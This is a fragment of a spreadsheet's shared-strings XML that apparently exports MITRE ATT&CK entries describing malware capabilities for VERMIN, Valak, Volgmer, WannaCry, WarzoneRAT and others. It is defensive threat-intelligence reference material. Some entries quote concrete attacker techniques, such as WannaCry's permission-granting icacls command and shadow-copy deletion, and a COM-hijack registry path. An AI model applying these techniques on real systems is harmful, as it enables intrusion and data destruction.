    <t>relationship--5070c502-1f3b-4e8c-8eb5-2ea5379fd8f4</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) decrypts code, strings, and commands to use once it's on the victim's machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--54c703f9-67ef-4622-afed-0ebbd2563e9e</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can delete files on the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--30c22798-520c-40cc-b53f-352a1c0a4940</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can download and upload files to the victim's machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--d68649d8-4f18-48b8-93b8-82c8660fc464</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects keystrokes from the victim machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--3dde25bf-03e8-4842-94cd-d596688c44d9</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is obfuscated using the obfuscation tool called ConfuserEx.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--a0bf84db-5482-4bc2-a53f-46d988e4f688</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can get a list of the processes and running tasks on the system.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--f6247612-3255-44eb-860f-e882ee1f36f6</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can perform screen captures of the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--8140f09f-af3b-45e1-ae7c-f2dc85b8930e</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) uses WMI to check for anti-virus software installed on the system.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--49b63fca-e16a-446e-89fc-2b899f8420bf</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is initially packed.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--141d1c0d-2f56-4b56-8834-ca3dab22faf9</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects the OS name, machine name, and architecture information.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--eade28d3-c5ce-453e-8e57-3262167c30be</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) gathers the local IP address.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--0829e860-9ea0-43c9-8bfd-55b4236d67af</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) gathers the username from the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--e0bb9da4-4cf5-4fcc-89c9-2cf174a34cae</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) uses HTTP for C2 communications.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>relationship--213b2924-9f77-4352-b92c-da83d00da353</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can download a module to search for and build a report of harvested credential data.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--7fb8ef27-0c19-4e31-9122-f89cd4283427</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use the clientgrabber module to steal e-mail credentials from the Registry.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--92c6a85d-d8b4-44d2-acf4-53ae07f69f77</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to decode and decrypt downloaded files.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--b99e218f-942b-4643-b4de-35649d2a4cbd</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate domain admin accounts.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--d4faeb90-07ee-4ae2-b77d-e002418d1b22</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can execute tasks via OLE.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--6bc33571-c702-4fcc-9f1c-b87d5a842586</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--8ae91ec7-32ed-46a2-9bc2-1c7b856c3cc7</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can communicate over multiple C2 hosts.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--495982e4-9856-4e7f-8e05-4654d67a4d62</t>
  </si>
  <si>
    <t>25 September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</si>
  <si>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</si>
  <si>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relationship--a40a85bf-69d3-4164-a735-fb9ecc7b656e</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</si>
  <si>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</si>
  <si>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relationship--86ce6e35-bf83-4d55-a3c8-3ac2e2d2f872</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can execute JavaScript containing configuration data for establishing persistence.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--6be48603-8603-45dd-8423-294169ca45a6</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate local admin accounts.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--d670ddce-d32a-4165-a56e-5bb183f4c904</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been executed via Microsoft Word documents containing malicious macros.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--51656ee5-4d21-42c9-9719-826645b3508f</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</si>
  <si>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</si>
  <si>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relationship--0841cd91-1151-411f-befc-0204e3a3eb30</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can download additional modules and malware capable of using separate C2 channels.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--48e3f4e2-0506-4b5c-b40c-2c6edc92b0a5</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--1fdd4a0b-fe6d-4fb1-a6ab-7f5063b6ecc3</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to base64 encode and XOR encrypt strings.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--25b8b66a-a9d0-4400-8b41-dd12208a25de</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used PowerShell to download additional modules.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--e2c05732-0721-4836-aa07-52f4c379b361</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate running processes on a compromised host.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--1ca28941-562d-45e4-946c-518a2015c0dd</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use the Registry for code updates and to collect credentials.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--b0d3ef27-8854-486f-942b-f0cd42c8a85c</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used &lt;code&gt;regsvr32.exe&lt;/code&gt; to launch malicious DLLs.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--2bdaa624-15bb-4a69-8192-adc9fa44af3f</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--99dfbbaa-5e58-4a03-9b94-fb6962681ce3</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--b91de2c3-897a-4e04-94f8-9e905564b47a</t>
  </si>
  <si>
    <t xml:space="preserve">[Valak](https://attack.mitre.org/software/S0476) has the ability to take screenshots on a compromised host.(Citation: Cybereason Valak May 2020)	 </t>
  </si>
  <si>
    <t>relationship--5797b454-e7cc-45a3-9bf1-7708d7286531</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can determine if a compromised host has security products installed.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--49c5bbcf-7ac3-406f-8b58-2b4c00b2c41e</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used packed DLL payloads.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--9ab85095-bac1-4b21-8e9d-e24c084af0d2</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been delivered via spearphishing e-mails with password protected ZIP files.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--7e9f9565-d9c5-47e5-a962-8dfa3dc77fc6</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been delivered via malicious links in e-mail.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--edb83e19-bc71-455e-bf38-4ab5c823ebc8</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has returned C2 data as encoded ASCII.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--be99408a-dc65-41a0-83db-235d8495e55c</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can determine the Windows version and computer name on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--7b4e1a93-99ca-444d-bfc4-bc589a9a25a9</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to identify the domain and the MAC and IP addresses of an infected machine.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--93169fdc-7afd-41b9-90bc-54d99c1c86e6</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can gather information regarding the user.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>relationship--5c46f9a0-fb83-473d-af9a-c1c98cfdd85b</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>relationship--4143e83e-40a1-4d10-babf-9affba3cb101</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--13c82683-dea9-418b-9112-a801c4cebc64</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use &lt;code&gt;wmic process call create&lt;/code&gt; in a scheduled task to launch plugins and for execution.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>relationship--e91ec241-b329-4488-ac65-442992f84fb5</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) can deobfuscate XOR-encoded shellcode prior to execution.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--1a06ec1e-319c-4229-8ec7-b368f3886791</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) has the ability to check for the presence of a specific DLL and terminate if it is not found.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--25e7301f-2207-4d02-aa69-772c222dab70</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) has the ability to download malicious shellcode to compromised systems.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--8972de3e-d073-47ec-9665-a10896601e12</t>
  </si>
  <si>
    <t>[VaporRage](https://attack.mitre.org/software/S0636) can use HTTP to download shellcode from compromised websites.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--ecb5f29d-9670-4997-991a-d99828906374</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) can download files.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>relationship--0e8a0760-f21e-4936-80a1-769c7ef61950</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) is capable of tunneling though a proxy.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>relationship--b150e3fd-54c0-49ec-a41f-860e92712344</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) copies itself to disk and creates an associated run key Registry entry to establish.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>relationship--498c599b-99ed-477d-afe8-2a6714506934</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) creates a backdoor by making a connection using a HTTP POST.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>relationship--02642f69-af18-42ba-a07e-ea44d3a311ea</t>
  </si>
  <si>
    <t>Some [Volgmer](https://attack.mitre.org/software/S0180) variants use SSL to encrypt C2 communications.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>relationship--a49ed7b1-8160-48ae-a65f-feeb4747c522</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) deobfuscates its strings and APIs once its executed.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>relationship--fd2f1a44-2ae7-4df0-b53c-42bc96af2da1</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can delete files and itself after infection to avoid analysis.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>relationship--fa14a106-cc98-4a5f-b849-85a5491eea36</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can list directories on a victim.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>relationship--084ac639-2502-4020-8938-65352349acbb</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) stores an encoded configuration file in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security&lt;/code&gt;.(Citation: US-CERT Volgmer Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>relationship--ab4acf2d-7761-4f78-92eb-cbd4fea45929</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can download remote files and additional payloads to the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>relationship--720cc0d6-9285-425b-bda2-3bdd59b4ea8f</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</si>
  <si>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</si>
  <si>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relationship--e5a99bb2-c6d6-4a9c-bf31-4edd1d602c4e</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) modifies the Registry to store an encoded configuration file in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security&lt;/code&gt;.(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>relationship--bd8fec61-37c8-489b-a74b-424ff85222ad</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) executes payloads using the Windows API call CreateProcessW().(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>relationship--4ed458b0-e5cd-48c7-baba-a33ca84a8738</t>
  </si>
  <si>
    <t>A [Volgmer](https://attack.mitre.org/software/S0180) variant is encoded using a simple XOR cipher.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e5d5ca1f-1e8e-4870-a9ef-33a963ee6148</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather a list of processes.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>relationship--83ea0666-2b0d-4db8-821c-e51c15335bd1</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) checks the system for certain Registry keys.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>relationship--2a945fce-862b-46ff-8ee5-b78b220803f3</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) uses a simple XOR cipher to encrypt traffic and files.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>relationship--5ac475f9-f253-44db-861e-c7303961aa6c</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather system information, the computer name, OS version, drive and serial information from the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>relationship--35697909-4c19-4799-a5ac-3153750619f8</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather the IP address from the victim's machine.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>relationship--9c4bbad5-4821-4059-b881-557c2a6db1a0</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather information about TCP connection state.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>relationship--ed561ab1-db94-4dbe-873b-d3e6cb488c4d</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) queries the system to identify existing services.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>relationship--6139509a-709b-4ef4-81fb-25b9a35e2c60</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can execute commands on the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>relationship--9f1c680d-042e-4291-bf9c-85c51120aa8b</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</si>
  <si>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</si>
  <si>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relationship--1436e328-e692-4dbc-adfd-cf1024a98b2e</t>
  </si>
  <si>
    <t>Variants of [WEBC2](https://attack.mitre.org/software/S0109) achieve persistence by using DLL search order hijacking, usually by copying the DLL file to &lt;code&gt;%SYSTEMROOT%&lt;/code&gt; (&lt;code&gt;C:\WINDOWS\ntshrui.dll&lt;/code&gt;).(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>relationship--191885b6-1282-4173-a2bd-174c30c8a1dc</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) can download and execute a file.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--a33a1a9c-c8d1-45f5-ad29-4a4188e5a54b</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) can open an interactive command shell.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--b3e4c3b6-0036-4968-b245-a4c36d3cd417</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) is capable of file deletion along with other file system interaction.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--b6970925-a435-4942-b244-60e4f57acf86</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) C2 traffic can communicate via TCP raw sockets.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--1984ba26-2309-49db-8c42-75951d0ef678</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather Registry values.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--47f611f4-b9f0-42ef-9629-ee4a56e737ed</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather the victim computer name.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--73fe447a-8d70-433f-be9a-5af74934a662</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather the victim user name.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--32218bd0-d598-4560-9a70-ab7d5c92f986</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate active windows.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--69f45e5e-2ebe-4cce-a4cd-e1db67bdff1a</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--819a5c4e-2bd6-4d9b-844c-21dc31e85a67</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate files and directories.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--33327a36-9f05-4a27-ac6a-d36e4cee0b21</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate processes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--149a056e-9061-4345-a46a-c1f73653d16a</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can gather information about the host.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--ed1aa5fa-7f0e-4d87-b3f5-7b50ab01e34b</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can gather information on the victim username.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--2f8d5603-0876-41dd-9fdb-ca9dc0ad6253</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate services.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--cd22a7a4-6f9f-481c-9a6d-6e1c665ed6cd</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic and routes a custom cryptographic protocol over the [Tor](https://attack.mitre.org/software/S0183) circuit.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>relationship--d9bfa498-69a1-44f9-8e44-67a6a4c48088</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>relationship--5c56206f-8ae3-4296-ab89-bc2036b74896</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses an exploit in SMBv1 to spread itself to other remote systems on a network.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: US-CERT WannaCry 2017)</t>
  </si>
  <si>
    <t>relationship--0e12dc13-6f73-4ad9-9cb5-845d443b4d58</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</si>
  <si>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</si>
  <si>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relationship--3ca496bf-41f9-4d0b-b36d-576f90db340e</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; to make some of its files hidden.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>relationship--a802b910-b023-425a-8c09-c1b2df185812</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</si>
  <si>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</si>
  <si>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relationship--76d0be57-e439-4640-b26d-db422353d9e5</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) attempts to copy itself to remote computers after gaining access via an SMB exploit.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>relationship--fe78de3a-107f-4870-b5a1-c60289d68dec</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>relationship--cf498579-a7c9-4d06-949b-fb75bf762990</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>relationship--3f58682a-dc04-40f6-b224-42bab6ef6f67</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) enumerates current remote desktop sessions and tries to execute the malware on each session.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>relationship--6b22c256-44a9-4b73-8df6-e4da9c32a5a3</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) scans its local network segment for remote systems to try to exploit and copy itself to.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>relationship--7a116d1c-33ab-4729-abff-2e37dc387f31</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>relationship--1427027f-0fd1-4781-b4b3-06dc8e6e9998</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) will attempt to determine the local network segment it is a part of.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>relationship--b3c7d447-9b00-4bd6-b0b7-25c0bb56d28a</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; and &lt;code&gt;icacls . /grant Everyone:F /T /C /Q&lt;/code&gt; to make some of its files hidden and grant all users full access controls.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>relationship--c49a3d89-c8fa-4c5d-813e-f4495d892d1a</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) utilizes &lt;code&gt;wmic&lt;/code&gt; to delete shadow copies.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>relationship--6ad5d5c8-b53e-417c-a574-3818269d1e85</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) creates the service "mssecsvc2.0" with the display name "Microsoft Security Center (2.0) Service."(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>relationship--facd3eca-9156-47a8-85d1-09719bc0eb88</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</si>
  <si>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</si>
  <si>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relationship--26fd5ea0-6f63-4c0a-9a84-23e489c1161c</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670)  can perform COM hijacking by setting the path to itself to the `HKCU\Software\Classes\Folder\shell\open\command` key with a `DelegateExecute` parameter.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--581061d3-6216-4a58-aa46-3640d8e94b02</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020)</t>
  </si>
  <si>
    <t>relationship--25a92f58-75d6-46a5-8e82-7f576f9659a5</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can collect data from a compromised host.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--2e87ee5b-2cf9-427f-b8c7-363e37daed88</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can use XOR 0x45 to decrypt obfuscated code.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--7e941100-b4aa-43fa-a7c5-328fb211ecce</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can disarm Windows Defender during the UAC process to evade detection.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--4d4da706-d1b7-4839-9a2b-52e03d23a44e</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can send collected victim data to its C2 server.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
    <t>relationship--213ea969-5e60-4128-9794-a09fb5f5eb5e</t>
  </si>
  <si>
    <t>[WarzoneRAT](https://attack.mitre.org/software/S0670) can enumerate directories on a compromise host.(Citation: Check Point Warzone Feb 2020)</t>
  </si>
  <si>
